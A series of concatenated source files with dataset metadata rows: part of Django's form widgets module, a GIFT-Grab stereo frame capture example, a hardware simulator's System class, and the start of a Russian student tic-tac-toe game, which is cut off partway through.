for name in MEDIA_TYPES:
getattr(self, 'add_' + name)(media_attrs.get(name, None))
# Any leftover attributes must be invalid.
# if media_attrs != {}:
# raise TypeError("'class Media' has invalid attribute(s): %s" % ','.join(media_attrs.keys()))
def __str__(self):
return self.render()
def render(self):
return mark_safe('\n'.join(chain(*[getattr(self, 'render_' + name)() for name in MEDIA_TYPES])))
def render_js(self):
return [format_html('<script type="text/javascript" src="{0}"></script>', self.absolute_path(path)) for path in self._js]
def render_css(self):
# To keep rendering order consistent, we can't just iterate over items().
# We need to sort the keys, and iterate over the sorted list.
media = sorted(self._css.keys())
return chain(*[
[format_html('<link href="{0}" type="text/css" media="{1}" rel="stylesheet" />', self.absolute_path(path), medium)
for path in self._css[medium]]
for medium in media])
def absolute_path(self, path, prefix=None):
if path.startswith(('http://', 'https://', '/')):
return path
if prefix is None:
if settings.STATIC_URL is None:
# backwards compatibility
prefix = settings.MEDIA_URL
else:
prefix = settings.STATIC_URL
return urljoin(prefix, path)
def __getitem__(self, name):
"Returns a Media object that only contains media of the given type"
if name in MEDIA_TYPES:
return Media(**{str(name): getattr(self, '_' + name)})
raise KeyError('Unknown media type "%s"' % name)
def add_js(self, data):
if data:
for path in data:
if path not in self._js:
self._js.append(path)
def add_css(self, data):
if data:
for medium, paths in data.items():
for path in paths:
if not self._css.get(medium) or path not in self._css[medium]:
self._css.setdefault(medium, []).append(path)
def __add__(self, other):
combined = Media()
for name in MEDIA_TYPES:
getattr(combined, 'add_' + name)(getattr(self, '_' + name, None))
getattr(combined, 'add_' + name)(getattr(other, '_' + name, None))
return combined
def media_property(cls):
def _media(self):
# Get the media property of the superclass, if it exists
sup_cls = super(cls, self)
try:
base = sup_cls.media
except AttributeError:
base = Media()
# Get the media definition for this class
definition = getattr(cls, 'Media', None)
if definition:
extend = getattr(definition, 'extend', True)
if extend:
if extend == True:
m = base
else:
m = Media()
for medium in extend:
m = m + base[medium]
return m + Media(definition)
else:
return Media(definition)
else:
return base
return property(_media)
class MediaDefiningClass(type):
"Metaclass for classes that can have media definitions"
def __new__(cls, name, bases, attrs):
new_class = super(MediaDefiningClass, cls).__new__(cls, name, bases,
attrs)
if 'media' not in attrs:
new_class.media = media_property(new_class)
return new_class
@python_2_unicode_compatible
class SubWidget(object):
"""
Some widgets are made of multiple HTML elements -- namely, RadioSelect.
This is a class that represents the "inner" HTML element of a widget.
"""
def __init__(self, parent_widget, name, value, attrs, choices):
self.parent_widget = parent_widget
self.name, self.value = name, value
self.attrs, self.choices = attrs, choices
def __str__(self):
args = [self.name, self.value, self.attrs]
if self.choices:
args.append(self.choices)
return self.parent_widget.render(*args)
class Widget(six.with_metaclass(MediaDefiningClass)):
is_hidden = False # Determines whether this corresponds to an <input type="hidden">.
needs_multipart_form = False # Determines does this widget need multipart form
is_localized = False
is_required = False
def __init__(self, attrs=None):
if attrs is not None:
self.attrs = attrs.copy()
else:
self.attrs = {}
def __deepcopy__(self, memo):
obj = copy.copy(self)
obj.attrs = self.attrs.copy()
memo[id(self)] = obj
return obj
def subwidgets(self, name, value, attrs=None, choices=()):
"""
Yields all "subwidgets" of this widget. Used only by RadioSelect to
allow template access to individual <input type="radio"> buttons.
Arguments are the same as for render().
"""
yield SubWidget(self, name, value, attrs, choices)
def render(self, name, value, attrs=None):
"""
Returns this Widget rendered as HTML, as a Unicode string.
The 'value' given is not guaranteed to be valid input, so subclass
implementations should program defensively.
"""
raise NotImplementedError('subclasses of Widget must provide a render() method')
def build_attrs(self, extra_attrs=None, **kwargs):
"Helper function for building an attribute dictionary."
attrs = dict(self.attrs, **kwargs)
if extra_attrs:
attrs.update(extra_attrs)
return attrs
def value_from_datadict(self, data, files, name):
"""
Given a dictionary of data and this widget's name, returns the value
of this widget. Returns None if it's not provided.
"""
return data.get(name, None)
def id_for_label(self, id_):
"""
Returns the HTML ID attribute of this Widget for use by a <label>,
given the ID of the field. Returns None if no ID is available.
This hook is necessary because some widgets have multiple HTML
elements and, thus, multiple IDs. In that case, this method should
return an ID value that corresponds to the first ID in the widget's
tags.
"""
return id_
class Input(Widget):
"""
Base class for all <input> widgets (except type='checkbox' and
type='radio', which are special).
"""
input_type = None # Subclasses must define this.
def _format_value(self, value):
if self.is_localized:
return formats.localize_input(value)
return value
def render(self, name, value, attrs=None):
if value is None:
value = ''
final_attrs = self.build_attrs(attrs, type=self.input_type, name=name)
if value != '':
# Only add the 'value' attribute if a value is non-empty.
final_attrs['value'] = force_text(self._format_value(value))
return format_html('<input{0} />', flatatt(final_attrs))
class TextInput(Input):
input_type = 'text'
def __init__(self, attrs=None):
if attrs is not None:
self.input_type = attrs.pop('type', self.input_type)
super(TextInput, self).__init__(attrs)
class NumberInput(TextInput):
input_type = 'number'
class EmailInput(TextInput):
input_type = 'email'
class URLInput(TextInput):
input_type = 'url'
class PasswordInput(TextInput):
input_type = 'password'
def __init__(self, attrs=None, render_value=False):
super(PasswordInput, self).__init__(attrs)
self.render_value = render_value
def render(self, name, value, attrs=None):
if not self.render_value: value=None
return super(PasswordInput, self).render(name, value, attrs)
class HiddenInput(Input):
input_type = 'hidden'
is_hidden = True
class MultipleHiddenInput(HiddenInput):
"""
A widget that handles <input type="hidden"> for fields that have a list
of values.
"""
def __init__(self, attrs=None, choices=()):
super(MultipleHiddenInput, self).__init__(attrs)
# choices can be any iterable
self.choices = choices
def render(self, name, value, attrs=None, choices=()):
if value is None: value = []
final_attrs = self.build_attrs(attrs, type=self.input_type, name=name)
id_ = final_attrs.get('id', None)
inputs = []
for i, v in enumerate(value):
input_attrs = dict(value=force_text(v), **final_attrs)
if id_:
# An ID attribute was given. Add a numeric index as a suffix
# so that the inputs don't all have the same ID attribute.
input_attrs['id'] = '%s_%s' % (id_, i)
inputs.append(format_html('<input{0} />', flatatt(input_attrs)))
return mark_safe('\n'.join(inputs))
def value_from_datadict(self, data, files, name):
if isinstance(data, (MultiValueDict, MergeDict)):
return data.getlist(name)
return data.get(name, None)
class FileInput(Input):
input_type = 'file'
needs_multipart_form = True
def render(self, name, value, attrs=None):
return super(FileInput, self).render(name, None, attrs=attrs)
def value_from_datadict(self, data, files, name):
"File widgets take data from FILES, not POST"
return files.get(name, None)
FILE_INPUT_CONTRADICTION = object()
class ClearableFileInput(FileInput):
initial_text = ugettext_lazy('Currently')
input_text = ugettext_lazy('Change')
clear_checkbox_label = ugettext_lazy('Clear')
template_with_initial = '%(initial_text)s: %(initial)s %(clear_template)s<br />%(input_text)s: %(input)s'
template_with_clear = '%(clear)s <label for="%(clear_checkbox_id)s">%(clear_checkbox_label)s</label>'
url_markup_template = '<a href="{0}">{1}</a>'
def clear_checkbox_name(self, name):
"""
Given the name of the file input, return the name of the clear checkbox
input.
"""
return name + '-clear'
def clear_checkbox_id(self, name):
"""
Given the name of the clear checkbox input, return the HTML id for it.
"""
return name + '_id'
def render(self, name, value, attrs=None):
substitutions = {
'initial_text': self.initial_text,
'input_text': self.input_text,
'clear_template': '',
'clear_checkbox_label': self.clear_checkbox_label,
}
template = '%(input)s'
substitutions['input'] = super(ClearableFileInput, self).render(name, value, attrs)
if value and hasattr(value, "url"):
template = self.template_with_initial
substitutions['initial'] = format_html(self.url_markup_template,
value.url,
force_text(value))
if not self.is_required:
checkbox_name = self.clear_checkbox_name(name)
checkbox_id = self.clear_checkbox_id(checkbox_name)
substitutions['clear_checkbox_name'] = conditional_escape(checkbox_name)
substitutions['clear_checkbox_id'] = conditional_escape(checkbox_id)
substitutions['clear'] = CheckboxInput().render(checkbox_name, False, attrs={'id': checkbox_id})
substitutions['clear_template'] = self.template_with_clear % substitutions
return mark_safe(template % substitutions)
def value_from_datadict(self, data, files, name):
upload = super(ClearableFileInput, self).value_from_datadict(data, files, name)
if not self.is_required and CheckboxInput().value_from_datadict(
data, files, self.clear_checkbox_name(name)):
if upload:
# If the user contradicts themselves (uploads a new file AND
# checks the "clear" checkbox), we return a unique marker
# object that FileField will turn into a ValidationError.
return FILE_INPUT_CONTRADICTION
# False signals to clear any existing value, as opposed to just None
return False
return upload
class Textarea(Widget):
def __init__(self, attrs=None):
# The 'rows' and 'cols' attributes are required for HTML correctness.
default_attrs = {'cols': '40', 'rows': '10'}
if attrs:
default_attrs.update(attrs)
super(Textarea, self).__init__(default_attrs)
def render(self, name, value, attrs=None):
if value is None: value = ''
final_attrs = self.build_attrs(attrs, name=name)
return format_html('<textarea{0}>\r\n{1}</textarea>',
flatatt(final_attrs),
force_text(value))
class DateInput(TextInput):
def __init__(self, attrs=None, format=None):
super(DateInput, self).__init__(attrs)
if format:
self.format = format
self.manual_format = True
else:
self.format = formats.get_format('DATE_INPUT_FORMATS')[0]
self.manual_format = False
def _format_value(self, value):
if self.is_localized and not self.manual_format:
return formats.localize_input(value)
elif hasattr(value, 'strftime'):
value = datetime_safe.new_date(value)
return value.strftime(self.format)
return value
class DateTimeInput(TextInput):
def __init__(self, attrs=None, format=None):
super(DateTimeInput, self).__init__(attrs)
if format:
self.format = format
self.manual_format = True
else:
self.format = formats.get_format('DATETIME_INPUT_FORMATS')[0]
self.manual_format = False
def _format_value(self, value):
if self.is_localized and not self.manual_format:
return formats.localize_input(value)
elif hasattr(value, 'strftime'):
value = datetime_safe.new_datetime(value)
return value.strftime(self.format)
return value
class TimeInput(TextInput):
def __init__(self, attrs=None, format=None):
super(TimeInput, self).__init__(attrs)
if format:
self.format = format
self.manual_format = True
else:
self.format = formats.get_format('TIME_INPUT_FORMATS')[0]
self.manual_format = False
def _format_value(self, value):
if self.is_localized and not self.manual_format:
return formats.localize_input(value)
elif hasattr(value, 'strftime'):
return value.strftime(self.format)
return value
# Defined at module level so that CheckboxInput is picklable (#17976)
def boolean_check(v):
return not (v is False or v is None or v == '')
class CheckboxInput(Widget):
def __init__(self, attrs=None, check_test=None):
super(CheckboxInput, self).__init__(attrs)
# check_test is a callable that takes a value and returns True
# if the checkbox should be checked for that value.
self.check_test = boolean_check if check_test is None else check_test
def render(self, name, value, attrs=None):
final_attrs = self.build_attrs(attrs, type='checkbox', name=name)
if self.check_test(value):
final_attrs['checked'] = 'checked'
if not (value is True or value is False or value is None or value == ''):
# Only add the 'value' attribute if a value is non-empty.
final_attrs['value'] = force_text(value)
return format_html('<input{0} />', flatatt(final_attrs))
def value_from_datadict(self, data, files, name):
if name not in data:
# A missing value means False because HTML form submission does not
# send results for unselected checkboxes.
return False
value = data.get(name)
# Translate true and false strings to boolean values.
values = {'true': True, 'false': False}
if isinstance(value, six.string_types):
value = values.get(value.lower(), value)
return bool(value)
class Select(Widget):
allow_multiple_selected = False
def __init__(self, attrs=None, choices=()):
super(Select, self).__init__(attrs)
# choices can be any iterable, but we may need to render this widget
# multiple times. Thus, collapse it into a list so it can be consumed
# more than once.
self.choices = list(choices)
def render(self, name, value, attrs=None, choices=()):
if value is None: value = ''
final_attrs = self.build_attrs(attrs, name=name)
output = [format_html('<select{0}>', flatatt(final_attrs))]
options = self.render_options(choices, [value])
if options:
output.append(options)
output.append('</select>')
return mark_safe('\n'.join(output))
def render_option(self, selected_choices, option_value, option_label):
if option_value == None:
option_value = ''
option_value = force_text(option_value)
if option_value in selected_choices:
selected_html = mark_safe(' selected="selected"')
if not self.allow_multiple_selected:
# Only allow for a single selection.
selected_choices.remove(option_value)
else:
selected_html = ''
return format_html('<option value="{0}"{1}>{2}</option>',
option_value,
selected_html,
force_text(option_label))
def render_options(self, choices, selected_choices):
# Normalize to strings.
selected_choices = set(force_text(v) for v in selected_choices)
output = []
for option_value, option_label in chain(self.choices, choices):
if isinstance(option_label, (list, tuple)):
output.append(format_html('<optgroup label="{0}">', force_text(option_value)))
for option in option_label:
output.append(self.render_option(selected_choices, *option))
output.append('</optgroup>')
else:
output.append(self.render_option(selected_choices, option_value, option_label))
return '\n'.join(output)
class NullBooleanSelect(Select):
"""
A Select Widget intended to be used with NullBooleanField.
"""
def __init__(self, attrs=None):
choices = (('1', ugettext_lazy('Unknown')),
('2', ugettext_lazy('Yes')),
('3', ugettext_lazy('No')))
super(NullBooleanSelect, self).__init__(attrs, choices)
def render(self, name, value, attrs=None, choices=()):
try:
value = {True: '2', False: '3', '2': '2', '3': '3'}[value]
except KeyError:
value = '1'
return super(NullBooleanSelect, self).render(name, value, attrs, choices)
def value_from_datadict(self, data, files, name):
value = data.get(name, None)
return {'2': True,
True: True,
'True': True,
'3': False,
'False': False,
False: False}.get(value, None)
class SelectMultiple(Select):
allow_multiple_selected = True
def render(self, name, value, attrs=None, choices=()):
if value is None: value = []
final_attrs = self.build_attrs(attrs, name=name)
output = [format_html('<select multiple="multiple"{0}>', flatatt(final_attrs))]
options = self.render_options(choices, value)
if options:
output.append(options)
output.append('</select>')
return mark_safe('\n'.join(output))
def value_from_datadict(self, data, files, name):
if isinstance(data, (MultiValueDict, MergeDict)):
return data.getlist(name)
return data.get(name, None)
@python_2_unicode_compatible
class ChoiceInput(SubWidget):
"""
An object used by ChoiceFieldRenderer that represents a single
<input type='$input_type'>.
"""
input_type = None # Subclasses must define this
def __init__(self, name, value, attrs, choice, index):
self.name = name
self.value = value
self.attrs = attrs
self.choice_value = force_text(choice[0])
self.choice_label = force_text(choice[1])
self.index = index
if 'id' in self.attrs:
self.attrs['id'] += "_%d" % self.index
def __str__(self):
return self.render()
def render(self, name=None, value=None, attrs=None, choices=()):
if self.id_for_label:
label_for = format_html(' for="{0}"', self.id_for_label)
else:
label_for = ''
return format_html('<label{0}>{1} {2}</label>', label_for, self.tag(), self.choice_label)
def is_checked(self):
return self.value == self.choice_value
def tag(self):
final_attrs = dict(self.attrs, type=self.input_type, name=self.name, value=self.choice_value)
if self.is_checked():
final_attrs['checked'] = 'checked'
return format_html('<input{0} />', flatatt(final_attrs))
@property
def id_for_label(self):
return self.attrs.get('id', '')
class RadioChoiceInput(ChoiceInput):
input_type = 'radio'
def __init__(self, *args, **kwargs):
super(RadioChoiceInput, self).__init__(*args, **kwargs)
self.value = force_text(self.value)
class RadioInput(RadioChoiceInput):
def __init__(self, *args, **kwargs):
msg = "RadioInput has been deprecated. Use RadioChoiceInput instead."
warnings.warn(msg, DeprecationWarning, stacklevel=2)
super(RadioInput, self).__init__(*args, **kwargs)
class CheckboxChoiceInput(ChoiceInput):
input_type = 'checkbox'
def __init__(self, *args, **kwargs):
super(CheckboxChoiceInput, self).__init__(*args, **kwargs)
self.value = set(force_text(v) for v in self.value)
def is_checked(self):
return self.choice_value in self.value
@python_2_unicode_compatible
class ChoiceFieldRenderer(object):
"""
An object used by RadioSelect to enable customization of radio widgets.
"""
choice_input_class = None
def __init__(self, name, value, attrs, choices):
self.name = name
self.value = value
self.attrs = attrs
self.choices = choices
def __getitem__(self, idx):
choice = self.choices[idx] # Let the IndexError propogate
return self.choice_input_class(self.name, self.value, self.attrs.copy(), choice, idx)
def __str__(self):
return self.render()
def render(self):
"""
Outputs a <ul> for this set of choice fields.
If an id was given to the field, it is applied to the <ul> (each
item in the list will get an id of `$id_$i`).
"""
id_ = self.attrs.get('id', None)
start_tag = format_html('<ul id="{0}">', id_) if id_ else '<ul>'
output = [start_tag]
for i, choice in enumerate(self.choices):
choice_value, choice_label = choice
if isinstance(choice_label, (tuple,list)):
attrs_plus = self.attrs.copy()
if id_:
attrs_plus['id'] += '_{0}'.format(i)
sub_ul_renderer = ChoiceFieldRenderer(name=self.name,
value=self.value,
attrs=attrs_plus,
choices=choice_label)
sub_ul_renderer.choice_input_class = self.choice_input_class
output.append(format_html('<li>{0}{1}</li>', choice_value,
sub_ul_renderer.render()))
else:
w = self.choice_input_class(self.name, self.value,
self.attrs.copy(), choice, i)
output.append(format_html('<li>{0}</li>', force_text(w)))
output.append('</ul>')
return mark_safe('\n'.join(output))
class RadioFieldRenderer(ChoiceFieldRenderer):
choice_input_class = RadioChoiceInput
class CheckboxFieldRenderer(ChoiceFieldRenderer):
choice_input_class = CheckboxChoiceInput
class RendererMixin(object):
renderer = None # subclasses must define this
_empty_value = None
def __init__(self, *args, **kwargs):
# Override the default renderer if we were passed one.
renderer = kwargs.pop('renderer', None)
if renderer:
self.renderer = renderer
super(RendererMixin, self).__init__(*args, **kwargs)
def subwidgets(self, name, value, attrs=None, choices=()):
for widget in self.get_renderer(name, value, attrs, choices):
yield widget
def get_renderer(self, name, value, attrs=None, choices=()):
"""Returns an instance of the renderer."""
if value is None:
value = self._empty_value
final_attrs = self.build_attrs(attrs)
choices = list(chain(self.choices, choices))
return self.renderer(name, value, final_attrs, choices)
def render(self, name, value, attrs=None, choices=()):
return self.get_renderer(name, value, attrs, choices).render()
def id_for_label(self, id_):
# Widgets using this RendererMixin are made of a collection of
# subwidgets, each with their own <label>, and distinct ID.
# The IDs are made distinct by y "_X" suffix, where X is the zero-based
# index of the choice field. Thus, the label for the main widget should
# reference the first subwidget, hence the "_0" suffix.
if id_:
id_ += '_0'
return id_
class RadioSelect(RendererMixin, Select):
renderer = RadioFieldRenderer
_empty_value = ''
class CheckboxSelectMultiple(RendererMixin, SelectMultiple):
renderer = CheckboxFieldRenderer
_empty_value = []
class MultiWidget(Widget):
"""
A widget that is composed of multiple widgets.
Its render() method is different than other widgets', because it has to
figure out how to split a single value for display in multiple widgets.
The ``value`` argument can be one of two things:
* A list.
* A normal value (e.g., a string) that has been "compressed" from
a list of values.
In the second case -- i.e., if the value is NOT a list -- render() will
first "decompress" the value into a list before rendering it. It does so by
calling the decompress() method, which MultiWidget subclasses must
implement. This method takes a single "compressed" value and returns a
list.
When render() does its HTML rendering, each value in the list is rendered
with the corresponding widget -- the first value is rendered in the first
widget, the second value is rendered in the second widget, etc.
Subclasses may implement format_output(), which takes the list of rendered
widgets and returns a string of HTML that formats them any way you'd like.
You'll probably want to use this class with MultiValueField.
"""
def __init__(self, widgets, attrs=None):
self.widgets = [w() if isinstance(w, type) else w for w in widgets]
super(MultiWidget, self).__init__(attrs)
def render(self, name, value, attrs=None):
if self.is_localized:
for widget in self.widgets:
widget.is_localized = self.is_localized
# value is a list of values, each corresponding to a widget
# in self.widgets.
if not isinstance(value, list):
value = self.decompress(value)
output = []
final_attrs = self.build_attrs(attrs)
id_ = final_attrs.get('id', None)
for i, widget in enumerate(self.widgets):
try:
widget_value = value[i]
except IndexError:
widget_value = None
if id_:
final_attrs = dict(final_attrs, id='%s_%s' % (id_, i))
output.append(widget.render(name + '_%s' % i, widget_value, final_attrs))
return mark_safe(self.format_output(output))
def id_for_label(self, id_):
# See the comment for RadioSelect.id_for_label()
if id_:
id_ += '_0'
return id_
def value_from_datadict(self, data, files, name):
return [widget.value_from_datadict(data, files, name + '_%s' % i) for i, widget in enumerate(self.widgets)]
def format_output(self, rendered_widgets):
"""
Given a list of rendered widgets (as strings), returns a Unicode string
representing the HTML for the whole lot.
This hook allows you to format the HTML design of the widgets, if
needed.
"""
return ''.join(rendered_widgets)
def decompress(self, value):
"""
Returns a list of decompressed values for the given compressed value.
The given value can be assumed to be valid, but not necessarily
non-empty.
"""
raise NotImplementedError('Subclasses must implement this method.')
def _get_media(self):
"Media for a multiwidget is the combination of all media of the subwidgets"
media = Media()
for w in self.widgets:
media = media + w.media
return media
media = property(_get_media)
def __deepcopy__(self, memo):
obj = super(MultiWidget, self).__deepcopy__(memo)
obj.widgets = copy.deepcopy(self.widgets)
return obj
@property
def needs_multipart_form(self):
return any(w.needs_multipart_form for w in self.widgets)
class SplitDateTimeWidget(MultiWidget):
"""
A Widget that splits datetime input into two <input type="text"> boxes.
"""
def __init__(self, attrs=None, date_format=None, time_format=None):
widgets = (DateInput(attrs=attrs, format=date_format),
TimeInput(attrs=attrs, format=time_format))
super(SplitDateTimeWidget, self).__init__(widgets, attrs)
def decompress(self, value):
if value:
value = to_current_timezone(value)
return [value.date(), value.time().replace(microsecond=0)]
return [None, None]
class SplitHiddenDateTimeWidget(SplitDateTimeWidget):
"""
A Widget that splits datetime input into two <input type="hidden"> inputs.
"""
is_hidden = True
def __init__(self, attrs=None, date_format=None, time_format=None):
super(SplitHiddenDateTimeWidget, self).__init__(attrs, date_format, time_format)
for widget in self.widgets:
widget.input_type = 'hidden'
widget.is_hidden = True
| bsd-3-clause | -8,474,089,965,727,551,000 | 35.813137 | 130 | 0.596628 | false |
gift-surg/GIFT-Grab | src/tests/blackmagic/stereo_capture.py | 1 | 4325 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Example demonstrating how stereo video frames can be captured
using a frame grabber card that supports this feature.
"""
import time
import cv2
import numpy as np
from pygiftgrab import (IObserver, VideoSourceFactory,
ColourSpace, Device, VideoFrame)
class StereoFrameSaver(IObserver):
"""
Simple class that demonstrates how mono and stereo frames,
and their respective parameters can be queried and the actual
frame data can be saved using the GIFT-Grab stereo API.
"""
def __init__(self):
super(StereoFrameSaver, self).__init__()
self.current = 0
def update(self, frame):
self.current += 1
# 4 is the number of variations of stereo/mono
# calls to the data method, using it here as well to
# avoid flooding the user's terminal
if self.current <= 4:
# display number of stereo frames, should be 2
# for this device
print(
'Got {} stereo frames'.format(
frame.stereo_count()
)
)
# display length of data of each stereo frame,
# each stereo frame should consist of same number
# of bytes for this device
print(
'Stereo data length (bytes):\n'
'\tdata_length(): {}\n'
'\tdata_length(0): {}\n'
'\tdata_length(1): {}\n'.format(
frame.data_length(), frame.data_length(0),
frame.data_length(1)
)
)
frame_shape = (frame.rows(), frame.cols(), 4)
# the slicing below, i.e. [:, :, :3], is due to OpenCV's
# imwrite expecting BGR data, so we strip out the alpha
# channel of each frame when saving it
if self.current == 1:
# all three calls below save the same frame,
# that is the first of the two stereo frames
cv2.imwrite(
'mono-frame.data.png',
np.reshape(frame.data(), frame_shape)[:, :, :3]
)
cv2.imwrite(
'mono-frame.data-False.png',
np.reshape(frame.data(False), frame_shape)[:, :, :3]
)
cv2.imwrite(
'mono-frame.data-False-0.png',
np.reshape(frame.data(False, 0), frame_shape)[:, :, :3]
)
elif self.current == 2:
# the two calls below save the two stereo frames,
# however the data needs to be reshaped, as the
# call to the data method yields a flat NumPy array
cv2.imwrite(
'stereo-frame.data-False-0.png',
np.reshape(frame.data(False, 0), frame_shape)[:, :, :3]
)
cv2.imwrite(
'stereo-frame.data-False-1.png',
np.reshape(frame.data(False, 1), frame_shape)[:, :, :3]
)
elif self.current == 3:
# the two calls below save the two stereo frames,
# without the need for reshaping the data, as the
# call to the data method already yields a
# structured NumPy array
cv2.imwrite(
'mono-frame.data-True.png',
frame.data(True)[:, :, :3]
)
cv2.imwrite(
'mono-frame.data-True-0.png',
frame.data(True, 0)[:, :, :3]
)
elif self.current == 4:
# the two calls below save the two stereo frames,
# without the need for reshaping the data, as the
# call to the data method already yields a
# structured NumPy array
cv2.imwrite(
'stereo-frame.data-True-0.png',
frame.data(True, 0)[:, :, :3]
)
cv2.imwrite(
'stereo-frame.data-True-1.png',
frame.data(True, 1)[:, :, :3]
)
if __name__ == '__main__':
sfac = VideoSourceFactory.get_instance()
source = sfac.get_device(
Device.DeckLink4KExtreme12G, ColourSpace.BGRA
)
saver = StereoFrameSaver()
source.attach(saver)
time.sleep(2) # operate pipeline for 2 sec
source.detach(saver)
| bsd-3-clause | -5,324,610,510,568,604,000 | 32.269231 | 71 | 0.52 | false |
arcade-lab/tia-infrastructure | tools/simulator/system.py | 1 | 9352 | """
Top-level system wrapper.
"""
import re
import sys
import pandas as pd
from simulator.exception import SimulatorException
class System:
"""
A system class to wrap a collection of processing and memory elements as well as the channels through which they
communicate.
"""
def __init__(self):
"""
Empty system.
"""
# Start at the zeroth cycle, and initialize system elements as empty lists to allow for appends.
self.cycle = 0
self.processing_elements = []
self.memories = []
self.buffers = []
# Add hierarchical elements for easier access.
self.quartets = []
self.blocks = []
self.arrays = []
# --- Time-stepping Method ---
def iterate(self, interactive, show_processing_elements, show_memories, show_buffers, keep_execution_trace):
"""
Move ahead one clock cycle, period or whatever you want to call it (this is a functional simulator).
:param interactive: waiting on the user at each cycle
:param show_processing_elements: showing processing element information
:param show_memories: showing memory element information
:param show_buffers: showing channel information
:return: whether the system has halted
"""
# Initially, assume the system is halting this cycle.
halt = True
# Print out a debug header, if requested.
if interactive or show_processing_elements or show_memories or show_buffers:
print(f"\n--- Cycle: {self.cycle} ---\n")
# Perform local processing element operations.
if show_processing_elements:
print("Processing Elements\n")
for processing_element in self.processing_elements:
processing_element.iterate(show_processing_elements, keep_execution_trace)
for processing_element in self.processing_elements:
halt &= processing_element.core.halt_register # Only halt if all processing elements have halted.
# Perform memory operations.
if show_memories:
print("Memories\n")
for memory in self.memories:
memory.iterate(show_memories)
# Commit all pending buffer transactions.
if show_buffers:
print("Buffers\n")
for buffer in self.buffers:
buffer.commit(show_buffers)
halt &= buffer.empty # Only halt the system if all buffers are empty.
# Move time forward assuming we are not halting.
if not halt:
self.cycle += 1
# Return whether we should halt.
return halt
# --- Display Methods ---
def halt_message(self):
"""
Print a message showing the state of the system upon halting.
"""
# Formatted message.
print(f"\n--- System halted after {self.cycle} cycles. ---\n")
print("Final Memory Layout\n")
for memory in self.memories:
print(f"name: {memory.name}")
print("contents:")
i = 0
while i < 10:
if i < len(memory.contents):
print(f"0x{memory.contents[i]:08x}")
else:
break
i += 1
if len(memory.contents) > 10:
print("...\n")
else:
print("bound\n")
def interrupted_message(self):
"""
Print a message showing the state of the system upon being interrupted by the user in a simulation.
:param self: system wrapper
"""
# Formatted message.
print(f"\n--- System interrupted after {self.cycle} cycles. ---\n")
print("Final Memory Layout\n")
for memory in self.memories:
print(f"name: {memory.name}")
print("contents:")
i = 0
while i < 10:
if i < len(memory.contents):
print(f"0x{memory.contents[i]:08x}")
else:
break
i += 1
if len(memory.contents) > 10:
print("...\n")
else:
print("bound\n")
# --- Top-level Methods ---
def register(self, element):
"""
Register a functional unit (processing element, memory, etc.) with the event loop.
:param element: functional unit
"""
# Make sure the functional unit has a special registration method.
registration_operation = getattr(element, "_register")
if not callable(registration_operation):
exception_string = f"The functional unit of type {type(element)} does not have internal system " \
+ f"registration method."
raise SimulatorException(exception_string)
# Call the functional unit's internal method.
element._register(self)
def finalize(self):
"""
Alphabetize components in the event loop for clean debug output and make sure all processing elements are
indexed.
"""
# The numerical strings are the ones we care about.
def natural_number_sort_key(entity):
name = entity.name
key_string_list = re.findall(r"(\d+)", name)
if len(key_string_list) > 0:
return [int(key_string) for key_string in key_string_list]
else:
return []
# Sort all the entities.
self.processing_elements = sorted(self.processing_elements, key=natural_number_sort_key)
for i, processing_element in enumerate(self.processing_elements):
if processing_element.name != f"processing_element_{i}":
exception_string = f"Missing processing element {i}."
raise SimulatorException(exception_string)
self.memories = sorted(self.memories, key=natural_number_sort_key)
self.buffers = sorted(self.buffers, key=natural_number_sort_key)
def run(self, interactive, show_processing_elements, show_memories, show_buffers, keep_execution_trace):
"""
Execute until the system halts or a user issues an interrupt or writes an EOF.
:param interactive: whether to wait for user input on each cycle
:param show_processing_elements: whether to show processing element status each cycle
:param show_memories: whether to show a summary of the memory contents each cycle
:param show_buffers: whether to show channel state each cycle
:param keep_execution_trace: whether to keep a running log of executed instructions on each processing element
:return: whether the system has halted and whether it was interrupted
"""
# Simple event/read-evaluate loop.
halt = False
interrupted = False
while True:
try:
if interactive:
if self.cycle > 0:
user_input = input("Press [Enter] to continue. Type \"exit\", or use [Ctrl-C] o [Ctrl-D] to "
+ "exit.\n").strip()
if user_input == "exit":
break
elif user_input != "":
print(f"Unrecognized command: {user_input}.", file=sys.stderr)
halt = self.iterate(interactive,
show_processing_elements,
show_memories,
show_buffers,
keep_execution_trace)
if halt:
self.halt_message()
break
except (KeyboardInterrupt, EOFError):
interrupted = True
self.interrupted_message()
break
# Return the status flags.
return halt, interrupted
def reset_processing_elements(self):
"""
Reset all the processing elements in a system.
"""
# Use the reset() methods built in to the processing elements.
for processing_element in self.processing_elements:
processing_element.reset()
def reset_memories(self):
"""
Reset all the memories in a system.
"""
# Use the reset() methods built in to the memories.
for memory in self.memories:
memory.reset()
def reset_buffers(self):
"""
Reset all the buffers in a system.
"""
# Use the buffers' own reset() methods.
for buffer in self.buffers:
buffer.reset()
def reset(self):
"""
Reset all the processing elements, memories and buffers.
"""
# Just wrap our own methods.
self.reset_processing_elements()
self.reset_memories()
self.reset_buffers()
@property
def processing_element_traces(self):
# Return a dictionary of execution traces.
return {processing_element.name: processing_element.core.execution_trace
for processing_element in self.processing_elements}
@property
def processing_element_traces_as_data_frame(self):
# For convenient CSV output and analysis.
return pd.DataFrame(self.processing_element_traces)
| mit | 3,835,425,596,161,252,000 | 34.558935 | 118 | 0.572391 | false |
Mariaanisimova/pythonintask | IVTp/2014/Shcherbakov_R_A/task_12_22.py | 1 | 1719 | # Задача 12. Вариант 22.
# Разработайте игру "Крестики-нолики". (см. М.Доусон Программируем на Python
# гл. 6).
# Щербаков Р.А.
# 22.05.2016
print("""
Добро пожаловать на игру крестики нолики
чтобы сделать ход введите число от 0 до 8
0 | 1 | 2
---------
3 | 4 | 5
---------
6 | 7 | 8""")
doska=["-","-","-","-","-","-","-","-","-"]
bol=True
wins=False
schet=0
def disp(doska):
print("\n\t"+doska[0]+" | "+doska[1]+" | "+doska[2]+"\n\t---------"+
"\n\t"+doska[3]+" | "+doska[4]+" | "+doska[5]+"\n\t---------"+
"\n\t"+doska[6]+" | "+doska[7]+" | "+doska[8]+"\n\t---------")
def win(doska):
twin=((0,1,2),(3,4,5),(6,7,8),(0,3,6),(1,4,7),(2,5,8),(0,4,8),(2,4,6))
for row in twin:
if doska[row[0]]==doska[row[1]]==doska[row[2]]!="-":
return True
while wins!=True:
if(schet==5):
break
if(bol):
n1=input("\nХод игрока 1: ")
if(doska[int(n1)]=="-"):
doska[int(n1)]="X"
disp(doska)
bol=False
wins=win(doska)
schet+=1
else:
print("Занято")
else:
n2=input("\nХод игрока 2: ")
